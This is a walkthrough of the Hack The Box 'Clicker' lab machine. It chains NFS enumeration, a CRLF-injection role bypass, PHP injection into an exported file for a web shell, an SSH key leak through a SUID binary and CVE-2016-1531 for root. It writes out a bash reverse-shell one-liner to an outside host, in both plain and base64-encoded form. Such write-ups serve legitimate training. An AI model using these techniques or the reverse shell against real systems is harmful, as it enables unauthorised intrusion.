HTB Clicker: Walkthrough

image

We begin with an open NFS mount that contains a backup of the webserver's source code. By analysing it, we find a CRLF injection vulnerability, allowing us to gain access to an admin.php endpoint. We can then leverage that endpoint to perform an SQL injection attack, gaining RCE on the host. The privilege escalation involves exploiting a vulnerable binary to read a user's SSH key. This finally ends with us abusing sudo privileges on a script, alongside CVE-2016-1531, to gain root access.

0) Machine Overview

  1. Scans
  2. NFS Enumeration
  3. Web Enumeration
  4. Privilege Escalation
  5. Privilege Escalation 2

1) Scans

PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 89:d7:39:34:58:a0:ea:a1:db:c1:3d:14:ec:5d:5a:92 (ECDSA)
|_  256 b4:da:8d:af:65:9c:bb:f0:71:d5:13:50:ed:d8:11:30 (ED25519)
80/tcp    open  http     Apache httpd 2.4.52 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://clicker.htb/
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34963/udp   mountd
|   100005  1,2,3      36427/udp6  mountd
|   100005  1,2,3      43273/tcp   mountd
|   100005  1,2,3      59335/tcp6  mountd
|   100021  1,3,4      34348/udp6  nlockmgr
|   100021  1,3,4      35611/tcp   nlockmgr
|   100021  1,3,4      39272/udp   nlockmgr
|_  100021  1,3,4      44029/tcp6  nlockmgr
2049/tcp  open  nfs      3-4 (RPC #100003)
35611/tcp open  nlockmgr 1-4 (RPC #100021)
38251/tcp open  status   1 (RPC #100024)
43273/tcp open  mountd   1-3 (RPC #100005)
57085/tcp open  mountd   1-3 (RPC #100005)
59583/tcp open  mountd   1-3 (RPC #100005)

2) NFS Enumeration

Let’s first check out this NFS mount:

image

Let's try mounting it:

image

image

We'll copy that file into another directory (one that isn't where the mount is located) and then unzip it. We should find what seems to be the web application's source code:

image

3) Web Enumeration

Let's analyze these files and see what interesting information we can find.

Firstly, I notice there are multiple parameters that are given to the user on creation:

image

I first tried a sort of mass-assignment and tried giving the role to myself on creation, but that didn’t work.

However, some parameters are passed in the URL when saving the game at /save_game.php:

image

So I thought, what if we try passing the role parameter in there as well, and setting it to Admin? Well, reviewing the source code, that isn't possible:

image

But this got me thinking of ways to bypass this security check.

  • I tried URL Encoding the word role, but it caught it.
  • I tried using unicode characters, different languages, but none of it worked.

Eventually, I came across a method called CRLF Injection.

Since I'm assuming it's checking for the role keyword in the URL parameter, this lets us inject the characters CRLFCRLF (making sure they are URL-encoded) and then specify our role parameter after them. That fools the web application into thinking that the body of the HTTP request begins right after the CRLF characters.
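To make that concrete from the defender's side, here is an added Python example (not code from this post or from the box's PHP) contrasting a denylist that compares each decoded parameter name against the word role, which is what I'm assuming the app does, with an allowlist of the names the endpoint actually expects; the allowed names and the sample query strings are my own assumptions.

```python
from urllib.parse import parse_qs

# Parameter names the save-game endpoint is meant to accept (assumed, not
# taken from the Clicker source); "role" is deliberately absent.
ALLOWED_KEYS = {"clicks", "level"}


def denylist_check(query: str) -> bool:
    """Weak check, modelled on the assumption above: the request is rejected
    only if a decoded parameter name is exactly 'role' (case-insensitive)."""
    params = parse_qs(query, keep_blank_values=True)
    return not any(key.lower() == "role" for key in params)


def allowlist_check(query: str) -> bool:
    """Hardened check: every decoded parameter name must be one of the
    expected names, so a name padded with CR/LF (or anything else) is
    rejected instead of being passed through to the UPDATE statement."""
    params = parse_qs(query, keep_blank_values=True)
    return all(key in ALLOWED_KEYS for key in params)


def classify(query: str) -> dict:
    """Return both verdicts (True = request accepted) for one raw query string."""
    return {"denylist": denylist_check(query), "allowlist": allowlist_check(query)}


# Constructed sample query strings (not captured from the box):
SAMPLES = {
    "legit": "clicks=10&level=2",
    "plain_role": "clicks=10&role=Admin",
    # URL-encoded CRLFCRLF in front of the parameter name, as described above;
    # parse_qs decodes the key to "\r\n\r\nrole", which no longer equals "role".
    "crlf_role": "clicks=10&%0d%0a%0d%0arole=Admin",
}

if __name__ == "__main__":
    for name, query in SAMPLES.items():
        print(f"{name:10s} {classify(query)}")
```

Only the allowlist rejects the CRLF-prefixed name; the denylist lets it through because the decoded key is no longer the exact string it is looking for.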

image

image

Now if we log out and log back in, we should be able to access /admin.php. The reason we need to re-log in is that, if we look back at the source code, it checks our SESSION id to decide whether we're authorized to access it.

image

Now all we have access to is an Export function. One thing I noticed while looking through the source code was that, of all the queries in the source code, they all used prepared statements… except one:

image

And the variable in this case seems to be $threshold.

image

And if we go to export these top players, and intercept the request:

image

And then inject some SQL into it…. It doesn’t work :(

I tried for quite a while with different payloads, but I just couldn’t get it to work. So I moved on from trying to perform SQLi.

I did however try messing with the extension. Normally, it only allows .txt, .pdf or .html. But if we manually change it ourselves through Burp, we can specify php, and it works.

Combine that with the fact that the SQL query retrieves the nickname, and we can try injecting some of our own PHP code into the nickname parameter via save_game.php. Then, hopefully, we'll be able to get a web shell.

Had to make a new user as the settings reset.

image

image

image

image

Let's get a full shell now.

First I base64-encoded:
/bin/bash -i >& /dev/tcp/10.10.14.14/5555 0>&1

and then used that as the payload: echo it, base64-decode it, and execute it with bash.

echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE0LzU1NTUgMD4mMQo=%20|%20base64%20-d%20|%20bash

image

4) Privilege Escalation

First, let's check out the database, since we have credentials for it from the source code.

image

image

Tried cracking a few of these to see if there's anything worthwhile. Couldn't crack any.

If we check for SUIDs:

image

An interesting file in /opt/manage shows up.

image

Let's take the executable offline and try reversing it to see how it functions.

image

So it seems that it has its 4 base cases, and if the input falls outside any of those 4, it falls through to the default case shown at the bottom. We can't know for sure what the command is doing from this alone, but we can assume it's going to read out a file, since one of the else branches in the code shows:

image

Let's try having it read some files.

image

Have it read jack’s id_rsa:

image

Before we try SSHing in, we'll need to fix the format of the key by adding a few - characters at the start and end of the id_rsa, since, as you can see, the format is a little messed up as is:

image

image

I had to add 2 - characters to the start and end for it to work.

Now we can finally SSH in:

image

5) Privilege Escalation 2

Let's run a quick sudo -l:

image

Checking out the file:

image

I originally tried a method where I made my own set binary, set it as an alias and placed it in my PATH, hoping that it would execute before the script sets my PATH manually, but that didn't work.

With some further enumeration (mainly wondering why that SETENV privilege was given to us) and some help, it turns out the vulnerability lies in xml_pp being a Perl script that's vulnerable to CVE-2016-1531.

To exploit it, we set 2 environment variables, one of which sets /bin/bash as SUID, as we execute the file:

image

image

Pwned.


This post is licensed under CC BY 4.0 by the author.